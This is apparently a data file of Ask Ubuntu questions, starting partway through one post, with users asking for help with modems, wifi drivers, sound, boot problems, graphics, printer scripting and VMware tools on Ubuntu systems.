ttyacm0 ) : deactivating device ( reason 'managed ' ) [ 2 ] jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] jan 21 19:14:33 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : unlock no longer required jan 21 19:14:33 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) closing serial port ... jan 21 19:14:33 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) serial port closed jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) starting connection 'telia telia 3g 1' jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 1 of 5 ( device prepare ) started ... jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 1 of 5 ( device prepare ) complete . jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) opening serial port ... jan 21 19:14:56 maximus whoopsie [ 1132 ] : offline jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : state changed ( disabled - > enabling ) jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > ( ttyacm1 ) opening serial port ... jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) : using pdu mode for sms jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : state changed ( enabling - > enabled ) jan 21 19:14:56 maximus networkmanager [ 902 ] : < info > wwan now enabled by management service jan 21 19:14:56 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : state changed ( enabled - > registered ) jan 21 19:14:57 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : state changed ( registered - > connecting ) jan 21 19:14:58 maximus modem-manager [ 846 ] : < info > modem /org/freedesktop/modemmanager/modems/1 : state changed ( connecting - > connected ) jan 21 19:14:58 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 2 of 5 ( device configure ) scheduled ... jan 21 19:14:58 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 2 of 5 ( device configure ) starting ... jan 21 19:14:58 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 21 19:14:58 maximus networkmanager [ 902 ] : < info > activation ( ttyacm0 ) stage 2 of 5 ( device configure ) successful . after this i need to reboot the computer to enable it again . so i downloaded modem-manager-gui and looked around in there . it also detect the mobile boradband , i can also enable it and scan for networks it works fine . it detects the right provider . i can also send sms and i do receive them . the sim-card have been successfully used in another computer before . $ > for n in `ls /sys/class/*/* { acm , wdm } */device/interface` ; do echo $ ( echo $ n|awk -f '/ ' ' { print $ 5 } ' ) : $ ( cat $ n ) ; done ttyacm0 : n5321 gw mobile broadband modem ttyacm1 : n5321 gw mobile broadband data modem ttyacm2 : n5321 gw mobile broadband gps port cdc-wdm1 : n5321 gw mobile broadband device management cdc-wdm2 : n5321 gw mobile broadband usim port cdc-wdm3 : ericsson n5321 gw anyone know what is wrong ? /br erik
408864	no sound devices detected on 12.04 lts after reboot	i recently installed 12.04 lts . after installing kernel 3.10.17 and the system updates and some other programs and rebooting i have no sound ; i mean nothing . my sound card is n't showing in the sound settings and when i open the alsa mixer this is what i see i 'm using a dell n4110 with ubuntu 12.04 lts , kernel 3.10.17 please help
408865	is it there a software like speedfan for ubuntu ?	i need to lower the cpu fan 's rpm . thanks in advance .
408869	simple way to setup triple boot of win 7 , ubuntu and fedora	i want to do triple boot with win 7 , ubuntu and fedora ( for the full gnome 3 experience ) on my 4gb ram 500gb hd , please show me how to do so . i want grub2 to be the default boot menu for the custom graphic features . ty . i seen this site but do n't know if it is legit . http : //www.linuxbsdos.com/2013/03/05/triple-boot-windows-7-ubuntu-12-10-and-fedora-18-on-one-hdd/
408870	wireless does not work on levovo g530 ( broadcom 4312 ) ubuntu 13.10	i am having problems getting my wifi to work on a lenovo g530 . the output of lspci -vvnn | grep 14e4 is the following : 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) it shows that the wifi is disabled by hardware switch but i have already verified that it is on . rfkill list is : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes unblocking command did n't help . i tried using both the `` bcmwl-kernel-source '' and `` firmware-b43-installer b43-fwcutter '' packages ( not at the same time ) , but the same problem persists . i installed them both manual and via synaptic .
408874	using avidemux for youtube preprocessing	i 'm trying to do what i would think to be among the simpler things one can do with avidemux , but i 'm having a real hard time figuring out exactly what to do . i 've got some videos shot with a panasonic point-and-shoot , and i want to preprocess them a little to make youtube happy and slightly improve the way they look . the main problem i 'm having is with audio . youtube 's documentation says that they like .mp4 files with the h.264 codec and pcm audio . well , when i try to make a .mp4 file like that with avidemux it tells me that pcm audio is n't supported for .mp4 files , and it then crashes if i tell it to proceed anyway . when i try it with mp3 audio , it produces an output file that plays fine via vlc , but the file when played back through avidemux itself plays with double-speed audio . it might be ok after upload ; i could of course try it and find out . however that makes me wonder why it would do that and whether there 's a way to fix it . this question suggests aac audio , but when i try that i get an error from avidemux : [ buildchain ] encoder initialization failed not activated , make sure number of channels and bitrate are compatible with encoder ! i get that error regardless of the bitrate chosen . ( that question also suggest pcm audio as a possibility , but as i said above avidemux seems not to agree . ) so : what is the right thing to do here ? i 'm a teeny bit surprised that avidemux does n't just have a `` youtube '' button here in 2014 , but i 'm pretty ignorant i guess . i 'm running avidemux version 2.5.4 on ubuntu linux 13.04 ( all up-to-date ) . note : i 've asked this already on the audio/video se site , so if it makes more sense for it to just be there then i can close this . ( that se site does n't even have an `` avidemux '' tag currently . )
408881	wireless dropouts or rebooting requires modprobe	i 'm trying linux for the first time in years so i 've very rusty in terminology . i 've managed to get my wireless pci card working , but it has random dropouts that prevent the card from working until i do a sudo modprobe rtl8821ae this also occurs should i perform a reboot . before i managed to get the wireless working there were no blocking drivers . do i need to edit a configuration file somewhere to load the driver on boot ? thanks for any help !
408882	set section config for clickpad on thinkpad	i have a new e540 thinkpad which has a clickpad with integrated buttons on the top . i have tried to enable these buttons and the middle mouse wheel simulation with a configuration file in the /etc/x11/xorg.conf.d/ : 11-edev-trackpoint.conf section `` inputclass '' identifier `` trackpoint catchall '' matchispointer `` true '' matchproduct `` trackpoint|dualpoint stick '' matchdevicepath `` /dev/input/event* '' option `` emulatewheel '' `` true '' option `` emulatewheeltimeout '' `` 200 '' option `` emulatewheelbutton '' `` 2 '' option `` xaxismapping '' `` 6 7 '' option `` yaxismapping '' `` 4 5 '' endsection 52-touchpad-quirks.conf section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' # this option is recommend on all linux systems using evdev , but can not be # enabled by default . see the following link for details : # http : //who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html matchdevicepath `` /dev/input/event* '' endsection section `` inputclass '' identifier `` touchpad ignore duplicates '' matchistouchpad `` on '' matchos `` linux '' matchdevicepath `` /dev/input/mouse* '' option `` ignore '' `` on '' endsection # this option enables the bottom right corner to be a right button on # non-synaptics clickpads . # this option is only interpreted by clickpads . section `` inputclass '' identifier `` default clickpad buttons '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 66 % 0 0 0 40 % 65 % 0 0 '' # natural scolling : option `` vertscrolldelta '' `` -111 '' option `` horizscrolldelta '' `` -111 '' # noise cancelling option `` horizhysteresis '' `` 20 '' option `` verthysteresis '' `` 20 '' option `` areatopedge '' `` 50 % '' # to disable the bottom edge area so the buttons only work as buttons , # not for movement , set the areabottomedge # option `` areabottomedge '' `` 20 % '' endsection # this option disables software buttons on apple touchpads . # this option is only interpreted by clickpads . section `` inputclass '' identifier `` disable clickpad buttons on apple touchpads '' matchproduct `` apple|bcm5974 '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 0 0 0 0 0 0 0 0 '' endsection this has the following affects : - > the scroll function on the right side of the touchpad is reversed , so when wiping from top to bottom the screen goes up ! - > no more wavering of the mouse cursor when clicking , which is perfect ! ! the configuration of the clickpad is now as follows : | -- -- -- -- -- -- -- -- -- -- -- | |llllllllllllllllllllll| |llllllllllllllllllllll| |lllllllmmmmmmmmrrrrrrr| |lllllllmmmmmmmmrrrrrrr| |lllllllmmmmmmmmrrrrrrr| |lllllllmmmmmmmmrrrrrrr| ++++++++++++++++++++++++ - > when clicking on the middle mouse ( mmmmmmm ) and holding and then moving the trackpoint the middle mouse wheel is not simulated ... does anyone know what i 'm doing wrong and how to enable the buttons on the clickpad ? ?
408893	my account not visible in user accounts	i am currently set to automatically log into this machine and i would like to change that . however , when i go to user accounts , i am no longer listed . lightdm/users.conf file is as such : [ useraccounts ] minimum-uid=500 hidden-users=nobody nobody4 noaccess hidden-shells=/bin/false /usr/sbin/nologin my current uid is 503 , username is none of the listed hidden-users , and my shell is /bin/bash . running ubuntu 13.04 with unity on a dell optiplex 3010 . also , greeter-show-manual-login=true had to be put in lightdm.conf so that i could log in because my account does not show up on the greeter either .
408894	syncing ipod shuffle	hello i 've tried to sync my ipod shuffle ( latest gen ) for 2 hours now ... i 've tried banshee ( i can put music on my device but not listening to it , `` use itunes blablabla '' ) , i 've tried gtkpod ( not launching ) , floola ( no ipod connected ) . how can i proceed ?
408898	remote file transfer ? ( transfer files on local machine from remote machine )	i have a file server that seconds as a media centre . lets call the server barton . it has 2 external hard drives plugged into it . it also constantly has video files playing on it which are outputting to a tv . now i have a laptop ( both machines are running ubuntu 13.10 ) on the same lan and i would like to organize my files on the two external hard drives connected to barton , without having to use the actual machine barton because it is being used to watch video files . so i 've trying ssh and samba connections with the laptop , which is fine for moving files around on the same disk , but when i want to transfer a folder from one external drive to another , this is where i have an issue . if i copy a folder from one external hard drive to another from the local machine barton i get a transfer rate of around 10-20mb/s ( which is pretty much the maximum that barton will allow given it 's hardware specifications . now if i do a similar transfer from my laptop using ssh or samba i get a transfer speed of around 100kb/s and this is not usable for trying to organize files . so i figure when using ssh or samba that the files have to get transferred over the network and that is why they are so slow . is there any way to get my laptop to tell barton to do the file transfer locally instead of trying to do it over the network ? as in , some way i can run commands from the laptop and have barton carry out the transfer at 10-20mb/s ? thank you .
408900	install correct drivers for asus usb-ac53 wifi adapter	not sure how to get it working . anyhelp would be appreciated .
408901	intel graphics installer	so i used the latest intel graphics installer to install the new drivers today on my 13.10 . the installer did it 's thing really fast and then told me to reboot . after doing that tough , i stil only have the graphics installer on my computer , while i should be having a program like this : did something go wrong ? i dont see the driver under the proprietary software menu also .
408905	unity and gnome-panel fighting over global bar 12.04	like so many others i wish there was a way to stop a window 's title bar from merging with the global bar at the top of the screen . today i installed gnome-panel to get the handy gnome-desktop-item-edit app because i wanted to add some scripts to the unity launcher and i 'm very happy to have the old familiar applications and places menus back . i noticed that when my mouse travels between the global bar and the focused window , it toggles the global bar between the title of the window and gnome-panel . very annoying . i already did sudo apt-get autoremove appmenu-gtk appmenu-gtk3 appmenu-qt to get the file edit etc . menus out of the global bar and back into the window , as suggested here . i 'd like to make gnome-panel be always there . i 've get a relatively good idea of the title of the window that i 'm in , after all , and i do n't need it hiding gnome-panel . any way to fix this ? or is it a `` use a new desktop environment '' scenario ?
408906	how to add printers to ubuntu en masse	i work at a company with many network printers . we 're switching many of our computers to ubuntu 13.04 and i need to add the printers en masse . i figured the best way to do that was through a script . this is an example line to add a printer : lpadmin -p printername -e -v socket : //ip.address -m ppd this adds a printer , but it fails to load the required ppd file . when i search for a ppd file , many of the links i find redirect me to a program called hplip , which apparently serves as a printer driver ? but how do i reference those ppd 's from a script file ? here 's the specific error i 'm getting : lpadmin : unable to copy ppd file .
408908	nexus 7 desktop raring killed on update	so my formerly awesome desktop raring multiboot partition on my nexus 7 was just killed during an update from the official arm repos ... everything seemed to work fine but on reboot i get the following ... mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox etc etc ... ( initramfs ) _ why ? i loved having desktop ubuntu linux on my tablet as an alternative to android , and put a lot of time into configuring it , and now it is dead , wiped by the looks of it ( there 's no way to enter commands into the busybox prompt ) . i do n't really intend to put a second proprietary touch-based os on there . i know the desktop ubuntu linux for tablet project was killed , but i do n't understand why my perfectly useable install of same just got wiped out . is there anything i can do to resurrect it , or should i just reclaim the ram on the nexus ?
408911	number of heads for drive 80 restored from 255 to 240	i have dual boot system win7 and ubuntu 12.04.3-desktop-amd64 . ubuntu was installed after win7 . when ubuntu boots i am getting this error `` ! ! number of heads for drive 80 restored from 255 to 240 . '' and then booting proceeds . everything seems okay except high pitched sound that my hdd seems to produce . this is not happening on win7 . i wonder can this high pitched sound be related to mentioned error and what i can do with that ? thanks .
408913	how to upgrade to the unstable ubuntu builds	is there a way to upgrade my ubuntu 12.04 install to trusty dev without upgrading via .iso because it keeps erasing my programs and my desktop environment that i 'm working on .
408916	xorg.conf for hybrid ati/intel	i 'm trying to get my intel hd 4400 and amd radeon 8670m working with the open source drivers . if i boot with an xorg.conf that includes : section `` device '' identifier `` intel graphics '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' identifier `` 8670m '' driver `` radeon '' busid `` pci:6:0:0 '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` intel graphics '' endsection then i do n't have a problem , but if i try and set the `` default screen '' to use the `` 8670m '' device , i boot only into low graphics mode . i am also getting various messages in kern.log such as radeon 0000:06:00.0 : no connectors reported connected with modes xorg.0.log gives similar sounding messages radeon no outputs connected , unable to definitely find connected outputs , radeon ( 0 ) : no modes , no screens found . anyone have any ideas ?
408917	commands that start sessions	i know of two commands that start sessions : gnome-session startlxde first , what flags are available to gnome-session . second , what other commands can be used for other desktop environments . i am looking for a list . note : i know it varies from system to system , but it is trivial for me to check if i have a command or not . note : i am doing this because i am doing x11 forwarding with ssh ( it is funny when ever your computer is running , and then you start a session with a widly different desktop environment , but all your applications are still there , in the new enviroment . it is differently more advanced than screen sharing . )
408918	how do i get a non-standard non-repo version of python under package management ?	for any number of reasons , i need a python version that is n't in mainline repositories . where should i look ? in my particular case i want 3.4 alpha/beta , but where should i look for non-standard python versions in general ?
408920	how to use noncompatible steam games ?	i have steam already on my computer . what i want to do now is install the games that are not already compatible with linux . i already have wine and playonlinux . i have tried these things with limited success . ( btw i am a complete noob , just put ubuntu on my second hardrive two days ago )
408923	problem installing old version of gcc with -- remove-all	im on ubuntu 13.10 and need gcc 4.6 to install cuda 5.5 . im following these instructions ( top answer ) anyone has successfully installed cuda 5.5 on ubuntu 13.10 64-bit ? but am runnning into trouble with the update-alternatives command . i have the current gcc on my computer and i installed ( sudo apt-get install ) gcc-4.6 , but when i run sudo update-alternatives -- remove-all gcc i just get the error update-alternatives : error : no alternatives for gcc however , looking around online it seems like the -- remove-all command is the solution to the error message i am getting ... so im having difficulty fixing it . if anyone could tell me what im doing wrong i would greatly appreciate it . best -user2275987
408927	i am not sure on whick disc ubuntu is on	i have a desktop with a dual boot , windows xp , which i hardly ever use , and ubuntu . ubuntu failed me and had a back square on the right-hand top , and after lots of forums and no luck to resolve it , i decided to reinstall ubuntu via a live cd . no such luck , as i am now can not even boot xp , and get a message : error : unknown filesystem grub rescue > i have done this three times now , and still get the same message . during the process i instructed to unmount . i hope that did not stuff things up . anyone out there who can help through this ? i am not very highly skilled though and would need patience and exact instructions . sudo fdisk -l disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x87de87de device boot start end blocks id system /dev/sda1 * 63 156296384 78148161 c w95 fat32 ( lba ) disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x963f963f device boot start end blocks id system /dev/sdb1 * 63 293760044 146879991 7 hpfs/ntfs/exfat /dev/sdb2 293761022 976773119 341506049 5 extended /dev/sdb5 964902912 976773119 5935104 82 linux swap / solaris /dev/sdb6 293761024 964902911 335570944 83 linux partition table entries are not in disk order disk /dev/sdc : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc048ea69 device boot start end blocks id system /dev/sdc1 63 1250258624 625129281 7 hpfs/ntfs/exfat disk /dev/sdd : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009f1e3 device boot start end blocks id system /dev/sdd1 2048 237579626 118788789+ 83 linux /dev/sdd2 237580286 488396799 125408257 5 extended /dev/sdd5 468523008 488396799 9936896 82 linux swap / solaris /dev/sdd6 237580288 468523007 115471360 83 linux partition table entries are not in disk order i am not sure which partition it is in ... is that bad ? : ! i am not sure which disc ubuntu is on . i am not sure if i edit my comments here ? avinash raj suggests to try boot repair ... i have no idea how to that either . i ran the boot repair and got a lot of data , which i tried to copy here via my laptop , but it comes up with a message `` you need at least 10 reputation to post more then 2 links . and it will not send the info here is part of it ubuntu @ ubuntu : ~ $ sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update you are about to add the following ppa to your system : simple tool to repair frequent boot problems . w : duplicate sources.list entry cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.2 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130213 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.2 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130213 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems ubuntu @ ubuntu : ~ $ how do i create a link-to post it as a comment ? i think i am getting totally confused here . first is this here the right spot to post my answers ? because i can not see it in the thread once i `` save my edits '' how do i creat a link to post it as a comment ? and what commands do i put in where ? please be patient and so not give up on me : ) no , i do not it stays on the terminal and i get this ubuntu @ ubuntu : ~ $ boot-repair : command not found boot-repair & [ 2 ] 7800 [ 1 ] exit 127 boot-repair ubuntu @ ubuntu : ~ $ boot-repair : command not found [ 1 ] + exit 127 boot-repair have been at it all day and have a huge head ache . thanks for all your help , i will need to go to bed now , but i will come back : ) : ) : ) i get now boot repair window . but : command not found exit 127 \boot repair
408929	asus h87-pro /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed	on an asus h87-pro : $ sudo pwmconfig # pwmconfig revision 5857 ( 2010-08-22 ) ( ... ) /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed here 's the output from $ sensors : acpitz-virtual-0 adapter : virtual device temp1 : +27.8°c ( crit = +97.0°c ) temp2 : +29.8°c ( crit = +97.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +40.0°c ( high = +86.0°c , crit = +92.0°c ) core 0 : +32.0°c ( high = +86.0°c , crit = +92.0°c ) core 1 : +33.0°c ( high = +86.0°c , crit = +92.0°c ) core 2 : +40.0°c ( high = +86.0°c , crit = +92.0°c ) core 3 : +31.0°c ( high = +86.0°c , crit = +92.0°c ) pkg-temp-0-virtual-0 adapter : virtual device temp1 : +41.0°c do i need/should i try https : //github.com/ambrosa/asus-p8p67-ubuntu-lm-sensors-driver ? do i need some acpi_osi= ... ( linux ? ) or acpi_enforce_resources= ... ( lax ? ) boot option ? do i need to install sensord read-edid i2c-tools on this board ? do i need to do something in the bios to `` allow '' fan control by the os ?
408932	error message when reading subdirectory from a usb drive	when attempting to display a directory ( sorry , i 'm strictly gui for now because i 'm new to this ) i get the following error for a folder that reads flawlessly when attached to various windows boxes . this location could not be displayed . sorry , could not display all the contents of âdisknameâ : error when getting information for file '/media/abc/etcetc/personal folders/img_0035.jpg ' : input/output error i am willing to toss the file to see if it resolves but i do n't know how to do that yet . i am going to get the appropriate terminal script and get to work on that but i thought i would ask here in the meantime . is there some way to find out why it hangs on the one file ? what is the easiest way to toss the file ? update : after trying to change the settings to suppress thumbnails ( thanks user3121023 ) and using newly learned commands in the terminal , i am still stuck . the command line returned the same error . i will mount the drive on a windows box later and try to see if i can resolve it there . i should at least be able to remove the file .
408934	make app-specific .css file for gtk theme	i have conflict problems with using dark theme and a kde application ( kile ) . as you can see from the screenshot , the log area ( at the bottom ) is black on gray , which is very annoying to read . i know one can make .css files for specific applications in /usr/share/themes/ < themename > /gtk-3.0/apps , but i am completely lost at where to start . can i get a quick rundown on how a gtk application ( such as kile ) will call stuff in the .css file of it 's name ?
408937	freshclam not working because clamav folder in /var/log and /var/log is in ramdisk	i was looking for this on the web but since english is not my primary language it seems that i can not find what i want , that is why my question is here ... intro : i have an ssd and i did some optimization procedures from these sites : site1 and site2 . and i have to say everything works ok , sometimes some things are lost because of tmpfs modifications . my optimizations include mounting tmpfs 's for folders as per instructions on these sites and one particular folder /var/log is used by clamav for storing its log folder and update log file - > /var/log/clamav/freshclam.log . now every time i reboot system , that folder /var/log/clamav is lost and freshclam command is not working and clamav returns errors about logging . i have to add folder clamav and file freshclam.log to /var/log manually and then freshclam command works and updates my clamav definitions ... question : is there any way that i set that folder and file to reappear after system reboot ( because i see that there are some default folders made on system startup and they are reappearing after every reboot ; they appear empty but nevertheless they are there ! ) ? p.s . : if i was not clear enough about problem or question i will explain again . if you need to see how my /etc/fstab file looks like i can post its contents ... thank you in forward !
408943	installing/booting	i have a working desktop running windows 7 . i also have an old macbook that has a completely empty hardrive ( no os , no nothing ) . i have been told that i can make a bootable usb drive using ubuntu software and install it onto the macbook . i can not figure out how to do this via a windows system . help !
408944	how to install and partition on a compaq presario sr5223wm	i have an old compaq presario sr5223wm . i am new to the ubuntu world . i recently used a program called dban to wipe out this computer . i had received the computer from a friend and wiped it , to remove personal info . so i decided to try ubuntu.the first time i installed it , everything installed easily , but , things seemed real slow and was n't for me . so , again i wiped it with dban.after reading a bunch of reviews on how people loved ubuntu , i thought maybe something had went wrong during installation . so , i decided to try it again . during install , things got hung-up , and the install process just hung . so again , i wiped with dban and started from scratch . finally , things started to install . but , during installation this time i was told i did not have enough room . dban again , re-install . now i get it all the way to the partitioning part . read online how to partition , now it will not let me create a swap and a partition ... getting way frustrated . can someone please explain step by step what it is i need to do ? my full intention for this computer is to be able to set it up as a media player with xbmc ( yes , i know about xbmc ubuntu , i have used it on this machine , but i need to be able to update drivers and such . thus my reason for using ubuntu . ) i thank anyone in advanced for any help . p.s . i do n't need to `` save '' anything on this computer , it 's completely wiped .
408952	mouse disappearing ( problems with display )	since i installed ubuntu 13.10 , the mouse pointer disappear ( not blink , really disappear ) . i can still move , click normally , but the cursor does n't appear . everytime this happens , on the settings > display , there 's a new display ( that does n't exist ) activated ( unknown 0 '' ) . if i disable this display , the cursor comes back . but when i close the settings > display , the display comes back and the mouse disappear . i do n't know what else to do . my laptop is a dell xps 15 l502x ( sandy bridge ) with nvidia gt540m and intel graphics .
408955	how to create a script to play a sound when f12 is pressed ?	i would like to listen a sound when yakuake terminal is displayed this happens pressing f12 , but i would like to listen a sound at the same time . any suggestion is more than welcome .
408957	you have held packages error when trying to install e17	i received the following error when trying to apt-get install e17 ( enlightenment window manager ) : curios : ~ $ sudo apt-get install e17 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : e17 : depends : libedje-bin but it is not going to be installed e : unable to correct problems , you have held broken packages . i then ran apt-get update and upgrade and then finally ran apt-mark showhold but the latter exited with no information . any advice ?
408960	how to sed and replace string with a folder path	i am trying to write the following bash script : home_dir=/opt/my_home find ./config -type f -exec sed -i `` s/_home_dir_/ $ _home_dir/g '' { } \ ; the line that i want to be changed in the files is this : users = `` _home_dir_/config/data/_domain_/users.conf '' so the end result must be : users = `` /opt/my_home/config/data/_domain_/users.conf '' but i am not getting that ... i guess it 's because of escape chars ... can anyone shed some light ? thanks
408967	vware tool install error	when install vmware-tools , i got the following error , what is the problem , how to solve it ? ( the version of vmware is 10.0.0 , and the ubuntu version is 13.10 ) , message is as following : using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-kofhsx/vmhgfs-only' /usr/bin/make -c /lib/modules/3.11.0-12-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-12-generic' cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/backdoor.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/backdoorgcc32.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/bdhandler.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/cpname.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/cpnamelinux.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/cpnamelite.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/dentry.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/dir.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/file.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/filesystem.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/fsutil.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/hgfsbd.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/hgfsescape.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/hgfsutil.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/inode.o cc [ m ] /tmp/modconfig-kofhsx/vmhgfs-only/link.o /tmp/modconfig-kofhsx/vmhgfs-only/inode.c : in function ‘hgfspermission’ : /tmp/modconfig-kofhsx/vmhgfs-only/inode.c:1893:29 : error : ‘struct dentry’ has no member named ‘d_count’ int dcount = dentry- > d_count ; ^ make [ 2 ] : *** [ /tmp/modconfig-kofhsx/vmhgfs-only/inode.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ _module_/tmp/modconfig-kofhsx/vmhgfs-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-12-generic' make : *** [ vmhgfs.ko ] error 2 make : leaving directory `/tmp/modconfig-kofhsx/vmhgfs-only'
408970	trying to install ubuntu from usb on acer	i just received an acer aspire v5 . when i turn it on it is apparent that it is running linpus linux . i get to the following prompt : `` [ root @ localhost / ] # '' and i have no idea what to do from there ? ? ? i downloaded ubuntu 13.10 on a usb drive , mounted it in the acer , stopped the boot process via f2 and set boot priority to the usb drive , but it still boots to linpus and i get the same message no matter how many times i try ? ? ? it appears to be useless unless i can get another os to install and run ! ! ! very frustrated , any help would be most appreciated ! thanks !
408971	how to find all the driver packages installed in my pc ?	i want to find or list all the driver packages ( wifi , graphics , etc ) installed on my ubuntu pc through apt-get or manually . how do i get that ?
408973	some windows are invisible in the unity switcher	when i try to switch from one window to another with unity toolbar , some windows are invisible as shown in the screenshot . you can better understand it from the snapshot of the desktop . is there a solution for this problem ?
408977	live usb hangs on boot	trying to re-install ubuntu gnome on my lenovo y500 laptop . i used nomodset and deleted quiet splash in the command line ( otherwise it just hangs at a black screen ) . it starts doing something , but displays text in 3 very squished terminals ( which are unread-ably small ) . i 'm not exactly sure what they say , but it always gets to what looks like the same place , then just hangs . i just re-flashed my live usb , and i 've used this usb before ( with various flavors of ubuntu ) , but i 'm not sure how i messed it up or how to fix it . i 've also tried using a different live usb , and had the same problem . my computer came with windows 8 and i updated to 8.1 . my original ubuntu gnome installation never worked properly , hence why i 'm trying to fix it . update : i 'm not sure how , but i got it to boot in a fullscreen terminal , so you can actually read what 's going on . can anybody help me here ?
408982	installed fx-6300 ( 6 core ) from semphron ( 1 core ) and now interrupt request storm ( ksoftirqd ) ?	scrypt mining in cgminer used to have no issues with semphron 145 , i switched to fx-6300 and processor usage shot up to 100 % and stuck there . cgminer process is consuming about 20 % and six ksoftirq processes are consuming the rest of the processor with interrupt requests . question is ... what do i do ? ! ? ! people with similar issue disabled the rest of the cores in the kernel and the problem was solved , but that 's not an option for me . because i upgraded the processor to use the rig as a media computer as well . anyone can suggest a solution to this ? edit : [ solved ] my solution involved uninstalling amd drivers and installing the amd 13.11 beta 9.95 drivers . note : i mention the version because the 13.12 stable drivers have an issue with the installer package that seems pretty common with dkms . install the 13.11 beta 9.95 drivers to circumvent this issue .
